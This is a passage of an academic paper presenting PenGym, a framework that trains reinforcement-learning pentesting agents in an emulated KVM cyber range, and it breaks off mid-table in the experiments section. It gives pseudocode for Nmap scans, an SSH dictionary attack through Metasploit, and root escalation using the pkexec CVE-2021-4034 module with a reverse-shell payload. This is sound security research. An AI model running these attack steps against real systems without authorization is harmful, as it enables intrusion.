PenGym: Pentesting Training Framework for Reinforcement

Learning Agents

Huynh Phuong Thanh Nguyen

, Zhi Chen

, Kento Hasegawa

, Kazuhide Fukushima

and

Razvan Beuran

Japan Advanced Institute of Science and Technology, Japan

KDDI Research, Inc., Japan

Keywords:

Penetration Testing, Reinforcement Learning, Agent Training Environment, Cyber Range.

Abstract:

Penetration testing (pentesting) is an essential method for identifying and exploiting vulnerabilities in com-

puter systems to improve their security. Recently, reinforcement learning (RL) has emerged as a promising

approach for creating autonomous pentesting agents. However, the lack of realistic agent training environ-

ments has hindered the development of effective RL-based pentesting agents. To address this issue, we pro-

pose PenGym, a framework that provides real environments for training pentesting RL agents. PenGym makes

available both network discovery and host-based exploitation actions to train, test, and validate RL agents in

an emulated network environment. Our experiments demonstrate the feasibility of this approach, with the

main advantage compared to typical simulation-based agent training being that PenGym is able to execute real

pentesting actions in a real network environment, while providing a reasonable training time. Therefore, in

PenGym there is no need to model actions using assumptions and probabilities, since actions are conducted

in an actual network and their results are real too. Furthermore, our results show that RL agents trained with

PenGym took fewer steps on average to reach the pentesting goal—7.72 steps in our experiments, compared

to 11.95 steps for simulation-trained agents.

1 INTRODUCTION

Network security plays a critical role in our current

network-centric society. Penetration testing (pentest-

ing) is an important aspect of cybersecurity that in-

volves assessing the security posture of networks or

systems by conducting ethical cyberattacks on them.

However, traditional pentesting has signiﬁcant chal-

lenges to overcome, such as the lack of IT profession-

als with sufﬁcient skills. Recently, there has been a

growing interest in applying machine learning tech-

niques to automate and improve pentesting.

In this context, reinforcement learning (RL) has

emerged as a promising approach for training agents

to perform pentesting tasks in a more effective man-

ner. Thus, RL agents aim to replicate the actions of

human pentesters, but with the speed, scale, and preci-

sion that only programs can achieve. This is achieved

by making it possible for the RL agents to navigate

complex network environments, detect vulnerabili-

ties, and exploit them to evaluate security risks. Fun-

damentally, through a process of trial and error, the

RL agents learn to optimize their actions by adapting

to various environment challenges (Zhou et al., 2021).

However, so far RL agents have been trained

and are performing penetration testing mainly in

simulated environments. Simulators provide an in-

memory abstraction of processes that occur in real

computer networks, which makes them faster and eas-

ier to use than their real counterparts. However, sim-

ulators often suffer from a “reality gap”, as the level

of abstraction used in simulator makes it difﬁcult to

deploy the trained agents in real networks. For exam-

ple, the authors of CyberBattleSim themselves argue

that their framework is too simplistic to be used in

the real world (Microsoft Defender Research Team,

2021). This means that agent performance may suffer

when used with real networks due to the differences

with the simulated environment. In particular, the

translation of simulated actions (e.g., exploits, priv-

ilege escalation) to real actions is not trivial. As a

result, creating and operating realistic environments

for the training of pentesting AI agents is crucial.

To address this issue, we have developed PenGym,

a framework for training RL agents for pentesting

purposes using a real cyber range environment. The

key feature of PenGym is that it makes it possible for

agents to execute real actions in an actual network en-

vironment, which have real results that correspond to

RL agent state and observations. Thus, PenGym elim-

498

Nguyen, T., Chen, Z., Hasegawa, K., Fukushima, K. and Beuran, R.

PenGym: Pentesting Training Framework for Reinforcement Learning Agents.

DOI: 10.5220/0012367300003648

Paper published under CC license (CC BY-NC-ND 4.0)

In Proceedings of the 10th International Conference on Information Systems Security and Privacy (ICISSP 2024), pages 498-509

ISBN: 978-989-758-683-5; ISSN: 2184-4356

inates the need to model agent actions via execution

assumptions and success probability. Therefore, our

approach provides a more accurate representation of

the pentesting process, since everything is based on

actual network behavior, and yields more realistic re-

sults than simulation.

The effectiveness of PenGym has been validated

through several experiments, which demonstrated its

reasonable training time and suitability as an alterna-

tive to simulation-based environments. Moreover, the

trained agents were used successfully to conduct real

pentesting attacks in the cyber range.

By using PenGym, security researchers and prac-

titioners can train RL agents to perform pentesting

tasks in a safe and controlled environment, thus ob-

taining more realistic results than via simulation, but

without the risks associated with real network pen-

testing. By providing the environment for executing

actions, the framework can also be used to evaluate

and compare the effectiveness in real network envi-

ronments of various pentesting RL techniques.

The main contributions of this paper are:

• Present the design and implementation of

PenGym, with particular focus on the action im-

plementation that represents its key feature.

• Discuss a set of experiments that demonstrate

the potential of using PenGym to effectively

train RL agents in pentesting when compared to

simulation-based training.

The remainder of this paper is organized as fol-

lows. In Section 2, we discuss related research works.

In Section 3, we provide an overview of the PenGym

architecture, followed by a detailed description of the

action/state module implementation in Section 4. We

then present the results of the validation experiments

in Section 5. The paper ends with a discussion, con-

clusions, and references.

2 RELATED WORK

The ﬁeld of cybersecurity has seen a growing use of

cyber range network environments as a popular train-

ing method for cybersecurity professionals. More-

over, recent studies have explored the design and im-

plementation of cyber range environments for con-

ducting cyber attack simulations and for training RL

agents in tasks such as intrusion detection, malware

analysis, and penetration testing. We will discuss

some of the most representative studies below; a

summary of their characteristics when compared to

PenGym is given in Table 1. All approaches are

compared based on their abstraction level and execu-

tion environment features. Regarding the abstraction

level, simulation-based approaches use a simulation

environment to execute actions. In these approaches,

actions are modeled by checking several required con-

ditions, and returning success if all the conditions are

met (Schwartz and Kurniawati, 2019). On the other

hand, emulation environments require actual hosts, an

actual network topology, and agents that execute real

actions on those hosts (Li et al., 2022). When con-

sidering execution environment features, the conﬁg-

urable elements are used for comparison, including

features such as ﬁrewalls and host actions.

Several frameworks were developed for cyber

range training. SmallWorld (Furfaro et al., 2018) and

BRAWL (The MITRE Corporation, 2018) use cloud-

based infrastructure and virtualization technologies to

simulate user interaction with a host, but they lack

RL capabilities. While some training environments

for AI-assisted pentesting that focus on host-based

exploitation have been proposed in previous studies

(Pozdniakov et al., 2020)(Chaudhary et al., 2020),

their scope of game goals and available actions is

quite limited. In (Ghanem and Chen, 2018), the au-

thors proposed a training environment for network

penetration testers modeled as a Partially Observable

Markov Decision Process (POMDP), but details of

the environment and reinforcement learning training

were not provided. Another experimental testbed for

emulated RL training for network cyber operations

is Cyber Gym for Training Autonomous Agents over

Emulated Network Systems (CyGIL) (Li et al., 2022).

CyGIL uses a stateless environment architecture and

incorporates the MITRE ATT&CK framework to es-

tablish a high-ﬁdelity training environment.

Network Attack Simulator (NASim) (Schwartz

and Kurniawati, 2019) proposed an RL agent train-

ing approach for network-wide penetration tests us-

ing the API of OpenAI Gym (Brockman et al., 2016).

NASim represents networks and cyber assets, includ-

ing hosts, devices, subnets, ﬁrewalls, services, and

applications, using abstractions modeled with a ﬁnite

state machine. The simpliﬁed action space includes

network and host discovery, service exploitation for

each conﬁgured service vulnerability in the network,

and privilege escalation for each hackable process

running in the network. The agent can simulate a sim-

pliﬁed kill chain through discovery, privilege escala-

tion, and service exploits across the network. How-

ever, NASim assumes that the simulated actions must

satisfy various predeﬁned conditions, and uses proba-

bilities to determine their success.

Microsoft has recently open-sourced its RL agent

network training environment, the CyberBattleSim

(CBS) (Microsoft Defender Research Team, 2021),

PenGym: Pentesting Training Framework for Reinforcement Learning Agents

499

Table 1: Comparison of related frameworks from abstraction level and environment feature perspectives.

Small World BRAWL

Smart Security

Audit

CyGIL

Microsoft

CBS

CybORG FARLAND NASim PenGym (Ours)

Abstraction Level

Simulation Based ✓ ✓ ✓ ✓ ✓

Real Hosts ✓ ✓ ✓ ✓ ✓ ✓ ✓

Real Network Topology ✓ ✓ ✓ ✓ ✓ ✓

Real Actions ✓ ✓ ✓ ✓ ✓ ✓ ✓

Real Observations ✓ ✓ ✓ ✓ ✓ ✓ ✓

Designed for RL ✓ ✓ ✓ ✓ ✓ ✓ ✓

Host-Based Exploitation ✓ ✓ ✓ ✓ ✓ ✓ ✓ ✓

Network-Based Exploitation

✓ ✓ ✓ ✓ ✓ ✓

Environment Features

Firewalls ✓ ✓ ✓

Network Scanning ✓ ✓ ✓ ✓ ✓ ✓

Host Scanning (OS Scan,

Process Scan, Service Scan)

✓ ✓ ✓

Exploits ✓ ✓ ✓ ✓ ✓ ✓ ✓ ✓

Privilege Escalation ✓ ✓ ✓ ✓ ✓ ✓ ✓

which is also built using the OpenAI Gym API. CBS

is designed for red agent training that focuses on the

lateral movement phase of a cyberattack in a simu-

lated ﬁxed network with conﬁgured vulnerabilities.

Similar to NASim, CBS allows users to deﬁne the net-

work layout and the list of vulnerabilities with their

associated nodes. It is important to note that CBS is

stated to have a highly abstract nature that cannot be

directly applied to real-world systems.

CybORG (Standen et al., 2021) is a gym for train-

ing autonomous agents through simulating and emu-

lating different environments using a common inter-

face. It supports red and blue agents, and implements

different scenarios at varying levels of ﬁdelity. Actu-

ator objects facilitate interactions with security tools

and systems, such as executing real actions through

APIs or terminal commands, using the Metasploit

pentesting framework (Maynor, 2011). The focus of

CybORG lies in developing an autonomous pentest-

ing agent using RL and host-based exploitation, al-

though it does not consider network trafﬁc discovery

or connections between subnets.

The FARLAND framework (Molina-Markham

et al., 2021) is designed for training agents via simu-

lation and testing agents via emulation. It offers func-

tionality such as probabilistic state representations

and support for adversarial red agents. However, un-

like CybORG, FARLAND focuses on network-based

discovery instead of host-based exploitation.

To summarize, all of the frameworks mentioned

above have their own limitations. Thus, some of them

are designed to support real environments with only

a few actions, such as exploits and privilege escala-

tion (Furfaro et al., 2018) (The MITRE Corporation,

2018) (Li et al., 2022). Moreover, some of those sys-

tems fail to consider the host conﬁguration before at-

tempting an attack, and are not designed for RL pur-

poses(Furfaro et al., 2018) (The MITRE Corporation,

2018). Other approaches focus on either host-based

exploit actions (Microsoft Defender Research Team,

2021) (Standen et al., 2021), or network-based ac-

tions (Molina-Markham et al., 2021), but not both of

them. Only NASim (Schwartz and Kurniawati, 2019)

supports both host-based and network-based actions,

including external ﬁrewalls, but it uses a simulation

environment to carry out these actions.

Given the limitations of NASim, and taking in-

spiration from the emulation approaches discussed so

far, we have developed PenGym as an extension of

the NASim library that makes it possible to both train

and use pentesting RL agents in real network environ-

ments. PenGym covers both network trafﬁc discovery

and host-based exploitation actions that are all actu-

ally conducted in the emulated environment.

3 PenGym OVERVIEW

PenGym is a framework for creating and managing

real environments aimed at training RL agents for

penetration testing purposes. It provides an environ-

ment where an RL agent can learn to interact with

a network environment, carrying out various pene-

tration testing tasks, such as exploit execution, and

privilege escalation. PenGym uses the same API with

the OpenAI Gymnasium (formerly Gym) library, thus

making it possible to employ it with all the RL agents

that follow those speciﬁcations.

An overview of PenGym is shown in Figure 1.

First, the RL agent selects an action from the avail-

able space using an algorithm suited to its learning

objectives. Subsequently, PenGym converts this logi-

cal action into an executable real action, which is then

executed in the cyber range environment set up using

KVM virtual machines. Following action execution,

the actual observations, such as available services or

exploit status, along with the new state of the envi-

ronment, are interpreted by PenGym and sent back to

ICISSP 2024 - 10th International Conference on Information Systems Security and Privacy

500

the agent. The agent receives a corresponding reward

and relevant system information. The rewards are de-

ﬁned via a scenario ﬁle, which contains different pos-

itive rewards for each successfully executed action. In

case of failure, the agent receives a negative reward.

For the scope of this paper, the reward values used

adhere to those predeﬁned in NASim. The agent then

updates its learning algorithm to select the next suit-

able action. For example, if an observation shows a

certain available service, the agent can use an exploit

based on that service for the next step. The use of the

acquired state information and corresponding reward

to reﬁne and enhance the underlying algorithm, ulti-

mately fosters the RL agent’s learning and optimiza-

tion process. This key functionality of PenGym is

implemented via its core component, the Action/State

Module, which has two main roles:

• Convert the actions generated by the RL agent

into real actions that are executed in the Cyber

Range environment.

• Interpret the outcome of the actions and returns

the state of the environment and the reward to the

agent, so that processing can continue.

Figure 1: Overview of the PenGym architecture.

The Action/State Module module implements a

range of penetration testing techniques that are exe-

cuted on actual target hosts, thus enabling penetration

testing in conditions similar to real-world scenarios.

The Cyber Range in PenGym is created using

KVM virtualization technology to build a custom net-

work environment that hosts virtual machines, with

each cyber range consisting of a predeﬁned group

of hosts, services, and vulnerabilities that are made

available for the interaction with the RL agent. The

composition and content of a cyber range is deter-

mined based on the content of NASim scenario ﬁles in

order to build an equivalent environment in PenGym.

NASim scenario ﬁles act as a blueprint for the cy-

ber range environment and a guide for the behavior of

the agents. In particular, they deﬁne: (i) the network

environment, such as the characteristics of the various

hosts (e.g., operating system, processes and services,

etc.), subnets and ﬁrewall rules between hosts, and (ii)

the actions that RL agents can take, how rewards are

obtained and what pre-conditions are necessary for

the agents to perform those actions successfully.

4 IMPLEMENTATION

In NASim, the action space is a collection of feasible

actions an agent can execute. These actions includes

various scan actions (e.g., service scan, OS scan, pro-

cess scan, and subnet scan) that help identify vulnera-

bilities and access points in the network. They mimic

the functionality of the Nmap utility (Lyon, 2014),

providing information about active services and the

operating system running on a speciﬁed host.

The action space in NASim allows for exploit ac-

tions on services and machines in the network, which

can lead to unauthorized access and the exploitation

of vulnerabilities. The success of an exploit action is

determined by factors such as the existence of the tar-

get service, ﬁrewall rules, and the success probability.

Privilege escalation, a tactic to gain higher access, is

also included. Thus, NASim simulates various net-

work security mechanisms.

One major limitation of using simulated actions

as done in NASim is that those actions may not accu-

rately replicate the real-world behavior. Although the

result of an action is determined by checking speciﬁc

conditions in the description ﬁle, it is important to rec-

ognize that other factors can also impact the success

of the action. Moreover, the network environment it-

self may not be accurately replicated in simulation,

including the conﬁguration and topology of the net-

work. Therefore, while simulation can provide valu-

able insights into network security, real-world execu-

tion is the only way to determine the effectiveness of

penetration testing agents.

The Action/State Module in PenGym aims to

bridge this gap by enabling the actual execution of RL

agent actions in the target cyber range. The outcome

of each action is determined based on the current sta-

tus of the virtual machine (VM) host in the network

environment, reﬂecting the real conditions of the sys-

tem. The actions currently implemented in PenGym

cover the entire functionality of NASim as required

by the scope of the ‘tiny’ scenario used in our exper-

iments, and can be extended for other scenarios. The

PenGym action space is divided into six categories:

1. Service Scan

2. Operating System (OS) Scan

3. Subnet Scan

4. Exploit

PenGym: Pentesting Training Framework for Reinforcement Learning Agents

501

5. Process Scan

6. Privilege Escalation

For Service Scan, OS Scan and Subnet Scan,

the real action implementation leverages the Nmap

utility (Lyon, 2014) to retrieve information about

the services and operating system of each host, and

the accessible subnets. More speciﬁcally, we use

the python-nmap library (Norman, 2021) to control

Nmap via the Python programming language.

The Exploit and Privilege Escalation actions

leverage the Metasploit penetration testing framework

(Maynor, 2011) to actually execute the correspond-

ing actions on the real target hosts. In particular, we

use the pymetasploit3 library (McInerney, 2020) to

control Metasploit execution via Python.

As for Process Scan, it is implemented by using

the ps command from the Linux operating system.

Note that, in order to reduce the execution time of

the actual actions, after the ﬁrst successful execution

of an action, the relevant information regarding the

result of that action is stored in a host map dictionary

and reused for subsequent executions. This dictionary

is used only for a single pentesting execution period

in testing. This period ends when the target hosts are

compromised or the step limit is exceeded. Similarly,

it is used for a single training time in training, which

ends when all the training epochs are ﬁnished. At

the beginning of each testing period or training time,

the dictionary is reset to an empty state. This ensures

that the optimization strategy does not affect the real-

ism of the overall training process or the evaluation of

trained agents during testing. It helps minimize time

by avoiding redundant actions that have already been

successful in the same period. This mimics real-world

situations where a pentester does not repeat successful

actions. Therefore, using the host map dictionary in

PenGym helps optimize execution time while main-

taining training realism. The following sections pro-

vide more details about each action implementation.

4.1 Service Scan

Service scanning is used to identify and provide de-

tails about the services that are running on a host. It

can also aid in the detection of potential vulnerabili-

ties in those services. To implement the Service Scan

action, we make use of the Nmap utility, which makes

it possible for PenGym to identify a wide range of ser-

vices, including web servers, SSH services, etc. Upon

success, the list of services running on the target host

is returned. The pseudocode for the implementation is

provided in Algorithm 1. Several arguments are used

to minimize the execution time of Nmap (-Pn to dis-

able ping use, -n to disable DNS resolution, and -T5

to enable the most aggressive timing template), and

-sS is used to enable TCP SYN scanning.

Algorithm 1: Service Scan Action.

Require: host, nmap, port=False

if port exist then

result ← nmap.scan(host,port,arguments

= ’Pn -n -sS -T5’)

else

result ← nmap.scan(host,arguments=’-Pn

-n -sS -T5’)

end if

service list ← list()

for host in result do

if host[port][state] is OPEN then

service list.append(service name)

end if

end for

Return service list

4.2 OS Scan

OS scanning is used to identify the operating system

that is running on a target host. This functionality

works by sending a series of probes to the target ma-

chine and analyzing the responses to determine the

characteristics of the operating system. The accuracy

of the scan results depends on the response from the

target machine and the effectiveness of the probing

technique used. The OS Scan action is implemented

via the Nmap utility. Upon success, the action will re-

turn the list of potential operating systems running on

the target host as identiﬁed Nmap. The pseudocode

for the implementation is provided in Algorithm 2.

In addition to time-optimization arguments, the argu-

ment -O is used to activate OS detection.

Algorithm 2: OS Scan Action.

Require: host, nmap, port=False

if port exist then

result ← nmap.scan(host,port,arguments

= ’-Pn -n -O -T5’

else

result ← nmap.scan(host,arguments=’-Pn

-n -O -T5’

end if

os list ← list()

for item in result do

os list.append(get os type(item))

end for

Return os list

ICISSP 2024 - 10th International Conference on Information Systems Security and Privacy

502

4.3 Subnet Scan

Algorithm 3: Subnet Scan Action.

Require: subnet, nmap, port=False

host list ← list()

if port exist then

result ← nmap.scan(subnet,

port, arguments = ’-Pn -n -sS -T5

-minparallel 100 -maxparallet 100’)

for host in result do

if host[’tcp’][port][state] is OPEN

then

host list.append(host)

end if

end for

else

result ← nmap.scan(host, arguments

= ’-Pn -n -sS -T5 -minparallel 100

-maxparallel 100’)

for host in result do

if host[status][state] is UP then

host list.append(host)

end if

end for

end if

Return host list

Subnet scanning is a type of scan used to identify the

active hosts within a speciﬁed network range, so that

the potential targets in that subnet can be determined.

Nmap subnet scanning works by sending a ping mes-

sage to each IP address within the speciﬁed network

range and then analyzing the responses to determine

which hosts are active.

The Subnet Scan action in PenGym is imple-

mented by using Nmap to scan the speciﬁed net-

work range and retrieve the active hosts. Upon suc-

cess, the list of the discovered hosts is returned; note

that we differentiate between already discovered and

newly discovered hosts, so that new potential targets

can be easily identiﬁed. The implementation pseu-

docode is provided in Algorithm 3. In addition to time

optimization, -minparallel and -maxparallel are

used to enable the parallel probing of the hosts.

4.4 Exploit

Exploits are techniques for ﬁnding and taking advan-

tage of vulnerabilities in software or systems to gain

unauthorized access or perform malicious actions. A

successful exploit will result in the target machine be-

coming compromised, and further steps can be per-

formed, such as stealing sensitive data, installing mal-

ware, or taking control of the system. Therefore, ex-

ploits are critical components of the penetration test-

ing process for advancing towards a target.

In PenGym, the Exploit action is implemented via

the Metasploit (Maynor, 2011) framework. Upon suc-

cessful completion, the shell object that makes it pos-

sible to access the target host, and the access level

(typically “USER”) are returned. The returned shell

object can be used to execute shell commands or navi-

gate through the ﬁle system. The returned access level

can be used to determine what actions are allowed or

restricted for the current user. The pseudocode for

the implementation is provided in Algorithm 4. The

Exploit action is currently implemented via an SSH

exploit based on the dictionary attack technique.

Algorithm 4: SSH Exploit Action.

Require: host

msfprc ← get msfprc client()

shell ← check shell exist()

if shell exist then

shell ← get existed shell of host()

access level ← get host access level()

Return shell, access level

else

exploit ssh ← msfrpc.modules.use

(’auxiliary’,’auxiliary/scanner/ssh/

ssh login’)

exploit ssh[’rhost’] ← host

exploit ssh[’username’] ← username

exploit ssh[’pass file’] ← pass file

end if

result ← exploit ssh.execute()

shell ← get shell(result)

access level ← get host access level()

Return shell, access level

4.5 Process Scan

Process scanning enables pentesters to conduct a thor-

ough security assessment by identifying the processes

running on a target host. This is done in view of de-

termining which vulnerabilities can potentially be ex-

ploited for getting further control of the host, such as

via privilege escalation techniques. Note that process

scanning requires access to the target host, hence it is

executed after successfully gaining access to it.

The Process Scan implementation in PenGym uti-

lizes the shell object obtained via the Exploit action,

and uses it to execute the ps command, which collects

information about the processes running on the target

host; upon success, the list of processes is returned.

To speed up process information extraction, the -A

and -o options are used to reduce execution time by

extracting only essential user values associated with

PenGym: Pentesting Training Framework for Reinforcement Learning Agents

503

the running processes, minimizing unnecessary over-

head. This approach ensures a faster retrieval of pro-

cess information and simpliﬁes subsequent manage-

ment of the extracted data (the implementation pseu-

docode is not included due to space limitations).

4.6 Privilege Escalation

Algorithm 5: Privilege Escalation Action.

Require: host

msfprc ← get msfprc client()

root shell ← check root shell exist()

normal shell id ← get normal shell id()

if root shell exists then

root shell ← get root shell()

access level ← get host access level()

Return root shell, access level

else

exploit pkexec ← msfrpc.modules.use

(’linux/local/cve 2021 4034 pkexec’)

exploit pkexec[’session’] ← shell id

payload ← ’meterpreter/reverse tcp’

end if

result ← exploit pkexec.execute()

root shell ← get shell(result)

access level ← get host access level()

Return root shell, access level

Privilege escalation is an essential step in pentesting

by which one attempts to gain administrator (root) ac-

cess on the target system. By obtaining a higher ac-

cess level than that of a regular user, a pentester gains

complete control of the target system and can perform

any actions on it. Privilege escalation is achieved

by exploiting speciﬁc vulnerabilities or misconﬁgu-

rations of the system to gain root level access. Note

that privilege escalation is conducted after success-

fully gaining regular user access to the target host.

The implementation of the Privilege Escalation

action utilizes the shell object obtained via the Ex-

ploit action to execute a privilege escalation ex-

ploit. In particular, we use the CVE-2021-4034

vulnerability in the pkexec program (National Vul-

nerability Database, 2021), for which a correspond-

ing module is implemented in Metasploit, named

linux/local/cve 2021 4034 pkexec. The imple-

mentation pseudocode is shown in Algorithm 5.

Optimizing the execution time of privilege escala-

tion is an important part of making PenGym run efﬁ-

ciently, and we achieved this as follows:

• Disabled the AutoCheck attribute in Metasploit.

• Return the result of the privilege escalation func-

tion as soon as a meterpreter is created, instead of

waiting for the job to ﬁnish.

• Only clean the Metasploit sessions and jobs after

an attack sequence ends.

5 EXPERIMENTS

In this section we discuss ﬁrst the main experiment

scenario, then the action implementation validation,

followed by several RL agent experiments.

5.1 Main Experiment Scenario

We used the scenario named ‘tiny’ deﬁned in NASim,

which is illustrated in Figure 2, both for RL agent

training and testing. This scenario consists of three

hosts divided into three subnets. Subnet(1) is directly

connected to the Internet, and the other subnets are in-

ternally connected. Each host has the same basic con-

ﬁguration, with a Linux OS, SSH service, and Tomcat

process. Firewall rules are enforced for secure com-

munication between subnets, and only SSH commu-

nication is allowed. Speciﬁcally, Subnet(1) is accessi-

ble from the Internet via SSH but cannot connect ex-

ternally. SSH access is allowed between subnets, ex-

cept for the connection from Subnet(1) to Subnet(2).

In practice, these restrictions were implemented via

the iptables Linux ﬁrewall conﬁguration utility.

For experiment purposes, we used KVM technol-

ogy to create a network environment that is based on

the ‘tiny’ scenario. This environment included all the

conﬁgurations deﬁned in this scenario, such as the

hosts and their settings, and the composition of the

subnets. In our experiments speciﬁc techniques are

used for exploits and privilege escalation. Namely, an

SSH dictionary attack is utilized to login to hosts, and

a pkexec vulnerability is used to obtain root access.

User accounts and passwords were set up accordingly

on the target hosts to enable these actions. The ex-

periments were conducted on a dual 12-core 2.2 GHz

Intel(R) Xeon(R) Silver 4214 CPU server with 64 GB

RAM. The NASim version we utilized was v0.10.0.

5.2 Action Implementation Validation

Table 2 provides a summary of the action implemen-

tation in NASim and PenGym, with differences high-

lighted in bold font. We also show the action execu-

tion times (for PenGym only for the very ﬁrst exe-

cution of an action within a session, since we cache

the output data to speed up subsequent execution).

Next we discuss the validation of action implemen-

tations in PenGym to demonstrate their equivalence

with NASim actions in terms of observations.

ICISSP 2024 - 10th International Conference on Information Systems Security and Privacy

504

Figure 2: Cyber range constructed in PenGym based on the ‘tiny’ scenario in NASim.

Table 2: Comparison of action implementation and execution time between NASim and PenGym.

Action NASim Implementation

Execution

Time [s]

PenGym Implementation

Execution

Time [s]

OS Scan